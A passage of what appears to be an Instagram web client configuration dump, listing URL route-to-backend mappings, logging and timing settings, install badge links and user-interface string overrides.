LLERY"},{"path":"\/accounts\/platform_tester_invites","destination":"DISTILLERY"},{"path":"\/accounts\/process_contact_point_signals","destination":"DISTILLERY"},{"path":"\/accounts\/reclaim\/confirm","destination":"WWW"},{"path":"\/accounts\/recovery\/password_reset","destination":"DISTILLERY"},{"path":"\/accounts\/remove\/confirmed\/*","destination":"DISTILLERY"},{"path":"\/accounts\/remove\/request","destination":"DISTILLERY"},{"path":"\/accounts\/remove\/request\/permanent\/www","destination":"WWW"},{"path":"\/accounts\/remove\/request\/permanent","destination":"DISTILLERY"},{"path":"\/accounts\/remove\/request\/temporary","destination":"WWW"},{"path":"\/accounts\/remove\/request\/post\/*","destination":"DISTILLERY"},{"path":"\/accounts\/request_one_tap_login_nonce","destination":"DISTILLERY"},{"path":"\/accounts\/row_tos_confirm\/*","destination":"DISTILLERY"},{"path":"\/accounts\/safe_redirect","destination":"DISTILLERY"},{"path":"\/accounts\/send_account_recovery_email_ajax","destination":"DISTILLERY"},{"path":"\/accounts\/send_account_recovery_sms_ajax","destination":"DISTILLERY"},{"path":"\/accounts\/send_confirm_email","destination":"DISTILLERY"},{"path":"\/accounts\/send_signup_sms_code_ajax","destination":"DISTILLERY"},{"path":"\/accounts\/send_two_factor_login_sms","destination":"DISTILLERY"},{"path":"\/accounts\/set_birthday","destination":"DISTILLERY"},{"path":"\/accounts\/set_comment_filter_keywords_web","destination":"DISTILLERY"},{"path":"\/accounts\/set_comment_filter_web","destination":"DISTILLERY"},{"path":"\/accounts\/set_gender","destination":"DISTILLERY"},{"path":"\/accounts\/set_presence_disabled","destination":"DISTILLERY"},{"path":"\/accounts\/set_private","destination":"DISTILLERY"},{"path":"\/accounts\/thrift_server","destination":"DISTILLERY"},{"path":"\/accounts\/two_factor_authentication\/ajax\/disable","destination":"DISTILLERY"},{"path":"\/accounts\/two_factor_authentication\/ajax\/enable","destination":"DISTILLERY"},{"path":"\/accounts\/two_factor_authentication\/ajax\/get_backup_codes","destination":"DISTILLERY"},{"path":"\/accounts\/two_factor_authentication\/disable_totp","destination":"DISTILLERY"},{"path":"\/accounts\/two_factor_authentication\/enable_totp","destination":"DISTILLERY"},{"path":"\/accounts\/username_suggestions","destination":"DISTILLERY"},{"path":"\/accounts\/validate_signup_sms_code_ajax","destination":"DISTILLERY"},{"path":"\/accounts\/verify_email","destination":"DISTILLERY"},{"path":"\/accounts\/verify_email_link_fallback","destination":"DISTILLERY"},{"path":"\/accounts\/web_change_profile_picture","destination":"DISTILLERY"},{"path":"\/accounts\/web_create_ajax","destination":"DISTILLERY"},{"path":"\/accounts\/web_create_ajax\/attempt","destination":"DISTILLERY"},{"path":"\/accounts\/address_book\/link","destination":"DISTILLERY"},{"path":"\/accounts\/address_book\/unlink","destination":"DISTILLERY"},{"path":"\/accounts\/remove\/request\/post\/temporary","destination":"DISTILLERY"},{"path":"\/hacked","destination":"WWW"},{"path":"\/support\/chat\/embed\/ig","destination":"WWW"},{"path":"\/accounts_center\/home","destination":"WWW"},{"path":"\/accounts_center\/profiles","destination":"WWW"},{"path":"\/accounts_center\/service","destination":"WWW"},{"path":"\/acredirect","destination":"DISTILLERY"},{"path":"\/ads\/*","destination":"WWW"},{"path":"\/ads\/ad_report_update","destination":"WWW"},{"path":"\/ads_data_from_partners\/ac_3pd_redirect","destination":"DISTILLERY"},{"path":"\/ads_data_from_partners\/legacy_3pd_redirect","destination":"DISTILLERY"},{"path":"\/ads_data_from_partners\/standalone_3pd_redirect","destination":"DISTILLERY"},{"path":"\/ads_data_from_partners\/standalone_legacy_3pd_redirect","destination":"DISTILLERY"},{"path":"\/ads_data_from_partners\/ac_3pd_linked_business_redirect","destination":"DISTILLERY"},{"path":"\/ajax\/bz","destination":"WWW"},{"path":"\/api\/*","destination":"DISTILLERY"},{"path":"\/api\/v1\/direct_v2\/restoration_cdn_url","destination":"WWW"},{"path":"\/api\/graphql","destination":"WWW"},{"path":"\/app\/hyperlapse","destination":"DISTILLERY"},{"path":"\/ar\/*","destination":"WWW"},{"path":"\/ar\/*\/push","destination":"DISTILLERY"},{"path":"\/assisted_account_recovery\/*\/*\/*","destination":"DISTILLERY"},{"path":"\/authenticity\/authenticity\/location\/get_location_verification","destination":"DISTILLERY"},{"path":"\/authenticity\/authenticity\/location\/set_location_verification","destination":"DISTILLERY"},{"path":"\/badges_milestones_management","destination":"DISTILLERY"},{"path":"\/bfad3e85bc","destination":"DISTILLERY"},{"path":"\/bfad3e85bc_cheap","destination":"DISTILLERY"},{"path":"\/business\/*","destination":"DISTILLERY"},{"path":"\/categories\/accounts","destination":"DISTILLERY"},{"path":"\/categories\/accounts\/*","destination":"DISTILLERY"},{"path":"\/challenge","destination":"WWW"},{"path":"\/challenge\/*","destination":"WWW"},{"path":"\/challenge\/action","destination":"WWW"},{"path":"\/challenge\/action\/*","destination":"WWW"},{"path":"\/challenge\/replay","destination":"DISTILLERY"},{"path":"\/challenge\/replay\/*","destination":"DISTILLERY"},{"path":"\/challenge\/reset","destination":"DISTILLERY"},{"path":"\/challenge\/reset\/*","destination":"DISTILLERY"},{"path":"\/challenge\/rewind","destination":"DISTILLERY"},{"path":"\/challenge\/rewind\/*","destination":"DISTILLERY"},{"path":"\/challenge\/stateless_challenge_with_node_id","destination":"DISTILLERY"},{"path":"\/client_error","destination":"DISTILLERY"},{"path":"\/coming_soon\/*","destination":"DISTILLERY"},{"path":"\/componentexplorer\/embeds","destination":"DISTILLERY"},{"path":"\/componentexplorer\/react","destination":"DISTILLERY"},{"path":"\/concurrent_request","destination":"DISTILLERY"},{"path":"\/persistent_request","destination":"DISTILLERY"},{"path":"\/api\/internal\/persistent_request_thrift","destination":"DISTILLERY"},{"path":"\/create\/configure_to_story","destination":"DISTILLERY"},{"path":"\/create\/configure","destination":"DISTILLERY"},{"path":"\/dogfoodnow\/whitelist_add","destination":"DISTILLERY"},{"path":"\/dogfoodnow\/whitelist_remove","destination":"DISTILLERY"},{"path":"\/live\/*\/comment\/*\/flag","destination":"DISTILLERY"},{"path":"\/media\/*\/comment\/*\/flag","destination":"DISTILLERY"},{"path":"\/live\/*\/flag","destination":"DISTILLERY"},{"path":"\/media\/*\/flag","destination":"DISTILLERY"},{"path":"\/users\/*\/flag","destination":"DISTILLERY"},{"path":"\/users\/*\/report","destination":"DISTILLERY"},{"path":"\/data\/experiments","destination":"DISTILLERY"},{"path":"\/data\/manifest.json","destination":"WWW"},{"path":"\/data\/qe_params","destination":"DISTILLERY"},{"path":"\/data\/shared_data","destination":"DISTILLERY"},{"path":"\/developer\/*","destination":"DISTILLERY"},{"path":"\/digital_collectibles","destination":"WWW"},{"path":"\/direct_v2\/*","destination":"DISTILLERY"},{"path":"\/directory\/hashtags","destination":"DISTILLERY"},{"path":"\/directory\/hashtags\/*","destination":"DISTILLERY"},{"path":"\/directory\/hashtags\/*","destination":"DISTILLERY"},{"path":"\/directory\/profiles","destination":"DISTILLERY"},{"path":"\/directory\/profiles\/*","destination":"DISTILLERY"},{"path":"\/directory\/profiles\/*","destination":"DISTILLERY"},{"path":"\/directory\/suggested\/*","destination":"DISTILLERY"},{"path":"\/donate\/redirect","destination":"DISTILLERY"},{"path":"\/donate\/ecp_checkout","destination":"DISTILLERY"},{"path":"\/donate\/ecp_redirect","destination":"DISTILLERY"},{"path":"\/download\/request","destination":"WWW"},{"path":"\/download\/request_download_data_ajax","destination":"DISTILLERY"},{"path":"\/download\/confirm\/*","destination":"WWW"},{"path":"\/download","destination":"WWW"},{"path":"\/download\/file.php","destination":"WWW"},{"path":"\/p\/dl\/download\/file.php","destination":"WWW"},{"path":"\/dyi\/download\/auth\/*","destination":"DISTILLERY"},{"path":"\/dyi\/lookaside_auth","destination":"DISTILLERY"},{"path":"\/emails\/emails_sent","destination":"WWW"},{"path":"\/emails\/preferences","destination":"DISTILLERY"},{"path":"\/emails\/unsubscribe\/*","destination":"WWW"},{"path":"\/embed_logger","destination":"DISTILLERY"},{"path":"\/enoozer\/action\/current\/*\/*\/*","destination":"WWW"},{"path":"\/enoozer\/action\/snooze","destination":"DISTILLERY"},{"path":"\/enoozer\/action\/undo","destination":"DISTILLERY"},{"path":"\/errors\/403","destination":"DISTILLERY"},{"path":"\/errors\/404","destination":"DISTILLERY"},{"path":"\/errors\/500","destination":"DISTILLERY"},{"path":"\/facebook_pay\/*","destination":"DISTILLERY"},{"path":"\/facebook_pay\/connect_learn_more","destination":"DISTILLERY"},{"path":"\/fb\/connect\/ajax","destination":"DISTILLERY"},{"path":"\/fb\/create\/ajax","destination":"DISTILLERY"},{"path":"\/fb\/create\/ajax\/attempt","destination":"DISTILLERY"},{"path":"\/fbsurvey","destination":"DISTILLERY"},{"path":"\/fbsurvey\/confirm_user","destination":"WWW"},{"path":"\/fxcal\/*","destination":"WWW"},{"path":"\/fxcal\/auth","destination":"WWW"},{"path":"\/fxcal\/auth\/login","destination":"WWW"},{"path":"\/fxcal\/auth\/login\/ajax","destination":"DISTILLERY"},{"path":"\/fxcal\/auth\/two_fac_login\/ajax","destination":"DISTILLERY"},{"path":"\/fxcal\/get_linking_auth_blob","destination":"DISTILLERY"},{"path":"\/fxcal\/iab_settings_confirm_login","destination":"WWW"},{"path":"\/fxcal\/iab_settings_perform_login","destination":"DISTILLERY"},{"path":"\/fxcal\/ig_sso_login","destination":"DISTILLERY"},{"path":"\/fxcal\/ig_sso_users","destination":"DISTILLERY"},{"path":"\/fxcal\/passwordless\/confirm_password\/ajax","destination":"DISTILLERY"},{"path":"\/fxcal\/reauth","destination":"WWW"},{"path":"\/fxcal\/reauth_login","destination":"WWW"},{"path":"\/fxcal\/specific_login","destination":"WWW"},{"path":"\/getapp","destination":"DISTILLERY"},{"path":"\/graphql\/ig_schema","destination":"DISTILLERY"},{"path":"\/graphql\/query","destination":"DISTILLERY"},{"path":"\/graphql_www","destination":"WWW"},{"path":"\/help\/*\/*","destination":"DISTILLERY"},{"path":"\/help\/ipreporting\/*","destination":"WWW"},{"path":"\/help\/support\/*","destination":"WWW"},{"path":"\/igtv\/configure_to_igtv","destination":"DISTILLERY"},{"path":"\/igtv\/drafts","destination":"DISTILLERY"},{"path":"\/igtv\/upload","destination":"DISTILLERY"},{"path":"\/igtv\/upload\/*","destination":"DISTILLERY"},{"path":"\/igtv_revshare_onboarding","destination":"DISTILLERY"},{"path":"\/instagramstickers","destination":"DISTILLERY"},{"path":"\/intern\/*","destination":"DISTILLERY"},{"path":"\/internal\/ig_product_principles","destination":"DISTILLERY"},{"path":"\/interstitial\/covid19\/*","destination":"DISTILLERY"},{"path":"\/invites\/contact","destination":"DISTILLERY"},{"path":"\/legal\/*","destination":"WWW"},{"path":"\/legal\/privacy","destination":"WWW"},{"path":"\/legal\/terms\/usgov","destination":"DISTILLERY"},{"path":"\/linking\/*","destination":"WWW"},{"path":"\/linking\/active_promotions","destination":"DISTILLERY"},{"path":"\/linking\/business_conversion","destination":"DISTILLERY"},{"path":"\/linking\/create_post","destination":"DISTILLERY"},{"path":"\/linking\/create_story","destination":"DISTILLERY"},{"path":"\/linking\/edit_profile","destination":"DISTILLERY"},{"path":"\/linking\/enter_promotion_payment","destination":"DISTILLERY"},{"path":"\/linking\/follow_and_invite_friends","destination":"DISTILLERY"},{"path":"\/linking\/igtv_upload","destination":"DISTILLERY"},{"path":"\/linking\/insights","destination":"DISTILLERY"},{"path":"\/linking\/inspiration_hub","destination":"DISTILLERY"},{"path":"\/linking\/news","destination":"DISTILLERY"},{"path":"\/linking\/promote","destination":"DISTILLERY"},{"path":"\/linking\/promote_story","destination":"DISTILLERY"},{"path":"\/linking\/use_appointments","destination":"DISTILLERY"},{"path":"\/linking\/view_all_lead_opportunities","destination":"DISTILLERY"},{"path":"\/linking\/view_all_leads","destination":"DISTILLERY"},{"path":"\/linking\/view_lead_details","destination":"DISTILLERY"},{"path":"\/linking\/view_lead_opportunity_details","destination":"DISTILLERY"},{"path":"\/linking\/view_services","destination":"DISTILLERY"},{"path":"\/linkshim\/*","destination":"DISTILLERY"},{"path":"\/linkshim","destination":"DISTILLERY"},{"path":"\/local\/dev\/transaction_tool_selector\/redirect\/save_fbe_extras","destination":"DISTILLERY"},{"path":"\/local\/dev\/transaction_tool_selector\/redirect","destination":"WWW"},{"path":"\/location_search","destination":"DISTILLERY"},{"path":"\/explore\/grid","destination":"DISTILLERY"},{"path":"\/explore\/map","destination":"DISTILLERY"},{"path":"\/explore\/locations","destination":"WWW"},{"path":"\/explore\/locations\/*","destination":"WWW"},{"path":"\/explore\/locations\/*\/qr","destination":"WWW"},{"path":"\/explore\/search\/keyword\/*","destination":"WWW"},{"path":"\/logging\/falco","destination":"DISTILLERY"},{"path":"\/media\/*\/comment\/*\/flag\/*","destination":"DISTILLERY"},{"path":"\/media\/*\/copyright\/*\/appeal_ridge","destination":"DISTILLERY"},{"path":"\/media\/*\/copyright\/*\/dismiss_ridge","destination":"DISTILLERY"},{"path":"\/media\/*\/copyright\/*\/dispute_ridge","destination":"DISTILLERY"},{"path":"\/media\/*\/copyright\/*\/restore_ridge","destination":"DISTILLERY"},{"path":"\/media\/*\/copyright\/*\/ridge_info","destination":"WWW"},{"path":"\/media\/*\/copyright\/am_info","destination":"DISTILLERY"},{"path":"\/media\/*\/copyright\/appeal","destination":"DISTILLERY"},{"path":"\/media\/*\/copyright\/delete","destination":"DISTILLERY"},{"path":"\/media\/*\/copyright\/dismiss_am","destination":"DISTILLERY"},{"path":"\/media\/*\/copyright\/dispute_am","destination":"DISTILLERY"},{"path":"\/media\/*\/copyright\/done","destination":"WWW"},{"path":"\/media\/*\/copyright\/info","destination":"DISTILLERY"},{"path":"\/media\/*\/delete","destination":"DISTILLERY"},{"path":"\/media\/*\/edit","destination":"DISTILLERY"},{"path":"\/media\/*\/flag\/*","destination":"DISTILLERY"},{"path":"\/media\/*\/flag\/*","destination":"DISTILLERY"},{"path":"\/media\/*\/product\/*\/flag","destination":"DISTILLERY"},{"path":"\/media\/*\/product\/*\/flag\/*","destination":"DISTILLERY"},{"path":"\/media\/*\/*\/story_poll_vote","destination":"DISTILLERY"},{"path":"\/media\/*\/*\/story_slider_vote","destination":"DISTILLERY"},{"path":"\/mixi\/oauth_callback","destination":"DISTILLERY"},{"path":"\/oauth\/*","destination":"WWW"},{"path":"\/oauth\/accept_platform_tester_invite","destination":"DISTILLERY"},{"path":"\/oauth\/access_token","destination":"DISTILLERY"},{"path":"\/oauth\/authorize","destination":"DISTILLERY"},{"path":"\/oauth\/batch_revoke_platform_permissions","destination":"DISTILLERY"},{"path":"\/oauth\/decline_platform_tester_invite","destination":"DISTILLERY"},{"path":"\/oauth\/info_sharing_disclaimer","destination":"WWW"},{"path":"\/oauth\/ofa_control\/allowlist_app","destination":"DISTILLERY"},{"path":"\/oauth\/ofa_control\/turn_on_future_activity","destination":"DISTILLERY"},{"path":"\/oauth\/ofa_control\/unblocklist_app","destination":"DISTILLERY"},{"path":"\/oauth\/oidc\/user_consent","destination":"DISTILLERY"},{"path":"\/oauth\/oidc\/user_reject","destination":"DISTILLERY"},{"path":"\/oauth\/platform_tester_invites","destination":"DISTILLERY"},{"path":"\/oauth\/revoke_access","destination":"DISTILLERY"},{"path":"\/oauth\/thrift_server","destination":"DISTILLERY"},{"path":"\/oidc\/state","destination":"WWW"},{"path":"\/qp\/batch_fetch_web","destination":"DISTILLERY"},{"path":"\/n\/*","destination":"DISTILLERY"},{"path":"\/nametag","destination":"DISTILLERY"},{"path":"\/p-ng","destination":"DISTILLERY"},{"path":"\/payments\/paypal_close","destination":"WWW"},{"path":"\/press","destination":"WWW"},{"path":"\/privacy\/activity_center","destination":"DISTILLERY"},{"path":"\/privacy\/checks","destination":"WWW"},{"path":"\/publicapi\/*","destination":"DISTILLERY"},{"path":"\/push\/preferences","destination":"DISTILLERY"},{"path":"\/push\/removetoken","destination":"DISTILLERY"},{"path":"\/push\/web\/get_push_info","destination":"DISTILLERY"},{"path":"\/push\/web\/register","destination":"DISTILLERY"},{"path":"\/push\/web\/update_settings","destination":"DISTILLERY"},{"path":"\/qr","destination":"WWW"},{"path":"\/raters\/summary\/*","destination":"DISTILLERY"},{"path":"\/realtime\/*","destination":"DISTILLERY"},{"path":"\/reports\/*\/flag\/hacked","destination":"DISTILLERY"},{"path":"\/reports\/*\/flag\/hacked\/*","destination":"DISTILLERY"},{"path":"\/reports\/flag_hacked_user","destination":"DISTILLERY"},{"path":"\/reports\/submit_reporter_appeal","destination":"DISTILLERY"},{"path":"\/reports\/user_report_support_feedback","destination":"DISTILLERY"},{"path":"\/reports\/web\/get_frx_prompt","destination":"DISTILLERY"},{"path":"\/reports\/web\/handle_guided_action","destination":"DISTILLERY"},{"path":"\/reports\/web\/notify_guardian","destination":"DISTILLERY"},{"path":"\/reports\/web\/log_tag_selected","destination":"DISTILLERY"},{"path":"\/repute\/*","destination":"DISTILLERY"},{"path":"\/restriction\/*","destination":"DISTILLERY"},{"path":"\/s\/*","destination":"WWW"},{"path":"\/security\/*","destination":"DISTILLERY"},{"path":"\/sem\/campaign","destination":"WWW"},{"path":"\/sem\/campaign\/login","destination":"WWW"},{"path":"\/sem\/campaign\/emailsignup","destination":"WWW"},{"path":"\/seo\/google_widget\/crawler","destination":"DISTILLERY"},{"path":"\/session\/login_activity\/avow_login","destination":"DISTILLERY"},{"path":"\/session\/login_activity\/disavow_login_activity","destination":"DISTILLERY"},{"path":"\/session\/login_activity\/logout_session","destination":"DISTILLERY"},{"path":"\/session\/login_activity\/undo_avow_login","destination":"DISTILLERY"},{"path":"\/settings\/help\/monetization_status","destination":"WWW"},{"path":"\/shop\/cart","destination":"DISTILLERY"},{"path":"\/shop\/cart\/*","destination":"DISTILLERY"},{"path":"\/shop\/products\/*","destination":"WWW"},{"path":"\/shopping\/bag","destination":"DISTILLERY"},{"path":"\/shopping\/home","destination":"DISTILLERY"},{"path":"\/sitemap\/*","destination":"DISTILLERY"},{"path":"\/stories\/*","destination":"WWW"},{"path":"\/suggested_users\/remove_from_suggested\/*\/*","destination":"DISTILLERY"},{"path":"\/suggested_users\/remove_from_suggested_confirm","destination":"DISTILLERY"},{"path":"\/support","destination":"DISTILLERY"},{"path":"\/survey\/us2020\/consent_withdraw","destination":"DISTILLERY"},{"path":"\/switcher\/placeholder","destination":"DISTILLERY"},{"path":"\/tags\/*","destination":"DISTILLERY"},{"path":"\/tags\/*\/qr","destination":"DISTILLERY"},{"path":"\/terms\/*","destination":"WWW"},{"path":"\/terms\/unblock","destination":"WWW"},{"path":"\/terms\/start\/*","destination":"DISTILLERY"},{"path":"\/test_users\/*","destination":"DISTILLERY"},{"path":"\/testing\/indigo_logging","destination":"DISTILLERY"},{"path":"\/testing\/validate_client_input","destination":"DISTILLERY"},{"path":"\/thirdparty\/static\/*","destination":"DISTILLERY"},{"path":"\/topics\/*","destination":"DISTILLERY"},{"path":"\/topics\/*\/*","destination":"DISTILLERY"},{"path":"\/two_factor\/*","destination":"DISTILLERY"},{"path":"\/two_factor\/two_factor_login","destination":"WWW"},{"path":"\/uid\/*","destination":"WWW"},{"path":"\/users\/*\/flag\/options","destination":"DISTILLERY"},{"path":"\/users\/*\/report_celebrity","destination":"DISTILLERY"},{"path":"\/users\/*\/report_underage","destination":"DISTILLERY"},{"path":"\/users\/*\/flag\/*","destination":"DISTILLERY"},{"path":"\/users\/*\/report\/*","destination":"DISTILLERY"},{"path":"\/users\/merchant\/*\/product\/*\/flag","destination":"DISTILLERY"},{"path":"\/users\/merchant\/*\/product\/*\/flag\/*","destination":"DISTILLERY"},{"path":"\/users\/self","destination":"WWW"},{"path":"\/users\/set_disallow_story_reshare_web","destination":"DISTILLERY"},{"path":"\/users\/set_feed_post_reshare_disabled_web","destination":"DISTILLERY"},{"path":"\/verification\/request","destination":"WWW"},{"path":"\/verification\/request\/done","destination":"WWW"},{"path":"\/verification\/*","destination":"DISTILLERY"},{"path":"\/video_call\/*","destination":"DISTILLERY"},{"path":"\/votinginfocenter","destination":"DISTILLERY"},{"path":"\/watch_together\/*","destination":"DISTILLERY"},{"path":"\/web\/lite","destination":"WWW"},{"path":"\/web\/*","destination":"DISTILLERY"},{"path":"\/webinstall\/instagram","destination":"DISTILLERY"},{"path":"\/webinstall\/instagram\/loggedin","destination":"DISTILLERY"},{"path":"\/webinstall\/instagram\/loggedout","destination":"DISTILLERY"},{"path":"\/webinstall\/iglite","destination":"DISTILLERY"},{"path":"\/webinstall\/iglite\/loggedin","destination":"DISTILLERY"},{"path":"\/webinstall\/iglite\/loggedout","destination":"DISTILLERY"},{"path":"\/weibo\/oauth_callback","destination":"DISTILLERY"},{"path":"\/wifiauth\/login\/*","destination":"DISTILLERY"},{"path":"\/xwoiynko","destination":"DISTILLERY"},{"path":"\/zr\/diagnostics","destination":"DISTILLERY"},{"path":"\/zr\/nux\/update_preference","destination":"DISTILLERY"},{"path":"\/explore","destination":"WWW"},{"path":"\/e2e\/*","destination":"DISTILLERY"}],"frontend_only_routes":[{"path":"\/create\/(story|style|details|location|tag|advanced-settings|advanced-settings\/alt-text)\/?","destination":"BOTH"},{"path":"\/accounts\/login\/two_factor\/?","destination":"BOTH"},{"path":"\/explore\/search\/?","destination":"BOTH"},{"path":"\/direct\/t\/?.*","destination":"BOTH"},{"path":"\/stories\/?.*","destination":"BOTH"},{"path":"\/[^\/]+\/similar_accounts\/?","destination":"BOTH"},{"path":"\/[^\/]+\/related_profiles\/?","destination":"BOTH"},{"path":"\/[^\/]+\/(following|hashtag_following|followers)\/?(mutualOnly|mutualFirst)?\/?","destination":"BOTH"}],"proxygen_request_handler_only_routes":[{"paths":["^\/$","^$"],"destination":"WWW","in_vpn_dogfooding":false,"in_qe":false}]},"platform_install_badge_links":{"ios":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yt\/r\/Yfc020c87j0.png","android":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yz\/r\/c5Rp7Ym-Klz.png","windows_nt_10":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yu\/r\/EHY6QnZYdNX.png"}}},6186],["CometUrlTransformsConfig",[],{"should_remove_trailing_slash":false},6589],["CometRouterConfig",[],{"bulkRouteFetchBatchSize":5},7542],["TimeSliceInteractionSV",[],{"on_demand_reference_counting":true,"on_demand_profiling_counters":true,"default_rate":1000,"lite_default_rate":100,"interaction_to_lite_coinflip":{"ADS_INTERFACES_INTERACTION":0,"ads_perf_scenario":0,"ads_wait_time":0,"Event":1},"interaction_to_coinflip":{"ADS_INTERFACES_INTERACTION":1,"ads_perf_scenario":1,"ads_wait_time":1,"Event":100},"enable_heartbeat":false,"maxBlockMergeDuration":0,"maxBlockMergeDistance":0,"enable_banzai_stream":true,"user_timing_coinflip":50,"banzai_stream_coinflip":0,"compression_enabled":true,"ref_counting_fix":false,"ref_counting_cont_fix":false,"also_record_new_timeslice_format":false,"force_async_request_tracing_on":false},2609],["MqttWebDeviceID",[],{"clientID":"573f7a79-fbfb-4cfa-8436-11e0287da935"},5003],["cr:2306",["NullState404FailedLoadingFB"],{"__rc":["NullState404FailedLoadingFB",null]},-1],["cr:3211",["NullStateGeneralFB"],{"__rc":["NullStateGeneralFB",null]},-1],["cr:3587",["NullStatePermissionsFB"],{"__rc":["NullStatePermissionsFB",null]},-1],["cr:10677",[],{"__rc":[null,null]},-1],["cr:983844",[],{"__rc":[null,null]},-1],["cr:1072546",[],{"__rc":[null,null]},-1],["cr:1072547",[],{"__rc":[null,null]},-1],["cr:1072549",[],{"__rc":[null,null]},-1],["cr:5278",["ReactDOM-prod.classic"],{"__rc":["ReactDOM-prod.classic",null]},-1],["cr:1172",["WebSession"],{"__rc":["WebSession",null]},-1],["cr:6016",["NavigationMetricsWWW"],{"__rc":["NavigationMetricsWWW",null]},-1],["cr:7384",["cancelIdleCallbackWWW"],{"__rc":["cancelIdleCallbackWWW",null]},-1],["cr:9985",["performanceAbsoluteNow"],{"__rc":["performanceAbsoluteNow",null]},-1],["cr:9986",["CurrentUser"],{"__rc":["CurrentUser",null]},-1],["cr:1268629",["setTimeoutCometLoggingPri"],{"__rc":["setTimeoutCometLoggingPri",null]},-1],["cr:1268630",["setTimeoutCometSpeculative"],{"__rc":["setTimeoutCometSpeculative",null]},-1],["cr:1396",["cometAsyncFetch"],{"__rc":["cometAsyncFetch",null]},-1],["cr:3019",[],{"__rc":[null,null]},-1],["cr:9804",[],{"__rc":[null,null]},-1],["cr:6669",["DataStore"],{"__rc":["DataStore",null]},-1],["cr:13733",[],{"__rc":[null,null]},-1],["BanzaiConfig",[],{"MAX_SIZE":10000,"MAX_WAIT":150000,"MIN_WAIT":null,"RESTORE_WAIT":150000,"blacklist":["time_spent"],"disabled":false,"gks":{"boosted_pagelikes":true,"platform_oauth_client_events":true,"sticker_search_ranking":true},"known_routes":["artillery_javascript_actions","artillery_javascript_trace","artillery_logger_data","logger","falco","gk2_exposure","js_error_logging","loom_trace","marauder","perfx_custom_logger_endpoint","qex","require_cond_exposure_logging","metaconfig_exposure"],"should_drop_unknown_routes":true,"should_log_unknown_routes":false},7],["cr:5695",["EventListenerWWW"],{"__rc":["EventListenerWWW",null]},-1],["cr:8909",["ReactFiberErrorDialogWWW"],{"__rc":["ReactFiberErrorDialogWWW",null]},-1],["cr:692209",["cancelIdleCallbackComet"],{"__rc":["cancelIdleCallbackComet",null]},-1],["DataStoreConfig",[],{"expandoKey":"__FB_STORE","useExpando":true},2915],["cr:1353359",["CometEventListener"],{"__rc":["CometEventListener",null]},-1],["FbtQTOverrides",[],{"overrides":{"1_000b6572c6a3f7fe9312e5879dd2e75b":"You'll need to log in with Workplace to continue this video chat.","1_023ac1e3f0ce2980598584f26a784b9f":"Ignore messages","1_028dc427119e6bfbfcd5eb2dd83b2a9e":"View Page status","1_075684469438a60ae5f6813949e94a0d":"Get quote","1_0778dc4cf3fe167942881fecddd5dee2":"Learn more","1_08a3224cc0fd966f2bb0e780c51e6a0b":"New poll","1_0a090165a1d0654210eb444114aabd7c":"Switch between accounts","1_0b9af3d5b6a4de6cb2b17ad5a0beec3a":"Learn more","1_0d0b40d72cd2adc492a402e98e18896f":"Chat notifications","1_0ea6e742163878d88375800514788740":"Invite link","1_0ea7de82b669cced737b30875f15309a":"Local event from Facebook","1_0f008d2991187964d472eceaf9ba28d6":"Featured sticker packs","1_0f48efb82ce58bf43dec6a98dcadc874":"Add your new number","1_0f9fceeb2e66627d9e346dd24e0d6916":"Remove from channel","1_0fee0283487e0259495a07f9e315ad8f":"Your home in Messenger","1_1068c1352d8cbb8919cc2b4a0dbcd9f3":"Hide contact","1_10811a6ece4ca15b10dc22f89805a347":"Customize your chat with {short-name}.","1_117fb24f8ee951759e9435520cc71e70":"More options","1_1248a8548f1b43fd3d9fc77baf835a04":"Contacts only","1_1593f9d2cc4c63f196a61a70eff664cf":"Send to group","1_159aa796a642d08a85379ec9693d25c7":"Opt in","1_1736f6743cf12be3ffc46cd556357e96":"Book now","1_18b8ec487f180574ad865f168eeafa70":"Content not found","1_1905e45a72593e291dda8c774aa4caf4":"Invite people","1_1ac128eda299351dc18567e7a6f31be6":"Hide video","1_1b38f249fefb0fd5ef7912a1fe615d10":"Pinned location","1_1b59f7e84dba4c8754cf60d1bafa6ae5":"Shared stories","1_1cf36465e606a10ef2a48c5dee532085":"Great job, {user_name}!","1_1d36c6e7b1a07971c84821452f9dc407":"Ignore conversation","1_1d89beed629123cabeeea834c345a7fc":"Mute notifications","1_1f209b12cabbe35509c514220825d53b":"New story","1_209b3fb19e7c487ffe3bd85b2adac6db":"Try again","1_20cec0b4386ad8555f8b619ad2c2fb81":"Single pop","1_215afaeceab4d29970af2c11221f79e3":"Web visibility","1_226d5171b148e60fe004a4f3cc53a81b":"Delete group chat?","1_23f5a1596d301feaeb32b47f24dc73a0":"Join call","1_243d55bab0d83c72b2113bfd5ca2e194":"Membership questions","1_25589d7cb1db33911bf18252dbb5155c":"Message history in Inbox","1_2745ba03fa7b9c0f59c0797fb44da204":"Showing in chats","1_27f38b56fa58a394e2d89fbf7288747b":"New sender","1_28ea9e6140b5437477564e5b21353246":"Profile picture","1_2953f6f20942da4f0593b905a4db3d90":"See details","1_2af4c8cb4d30a1aaa744a75187d6b06d":"{number} invited by you","1_2b2898b200686215c54616553499fddf":"Unread messages","1_2b406f4727fff3df7dd970cac1c41536":"Messenger preview","1_2c2ff60e8d5edccadadf61f739b6d87b":"Report story","1_3002f3a3232973642407c2e3830c10f6":"Stop sharing location","1_30ed561a77bfcadb3b66d5960c2a9e05":"Photo reminders","1_313c1c8a5025b45c60712685f0d89c6c":"App visibility","1_33886f5d4a6ede055ec28ddf69251cc5":"Life events","1_3543833b8b31fbb1561d46f2c0b266a8":"Added with theme","1_366d38e456780d92844ab4b39ac1de78":"Not interested","1_37900af383a573c0337521bca05d7955":"Respond to event","1_37ebfbfd36c55a8366f7ba9d528cf7b3":"Chats you can create","1_39339bb4b3f3002e589625a820bf5c7a":"Learn more","1_3a9a1e192465754ec4427995fe1cffb4":"Buy and sell groups","1_3aa3f2c2971602310d482c632c086db8":"Chat hosts","1_3bc7a4f74be5e3dbfdc9b758fa779fff":"Chat plugin","1_3cee79cd9e136ffc84ccfc7082bef6c2":"{number_of_happening_now_events} happening now, {number_of_upcoming_events} upcoming","1_3e8fba90f69e371d19c5b4f79e3f0be7":"Buy and sell groups","1_3f4c233aac1d71d17bee559b932144d3":"See conversation","1_41446ff5d2de26a67626d2ba309c969b":"This video can't be sent","1_4151657ef8e7bc03ab8169e5dcb0d675":"Cancel request","1_41eadd6427237386cc04b60a8ab94a8b":"This chat will show as unread","1_46793f5529ff4a62f831cf9218082b7f":"Unread requests","1_46879d905028aaee9f7297d27c075b50":"See 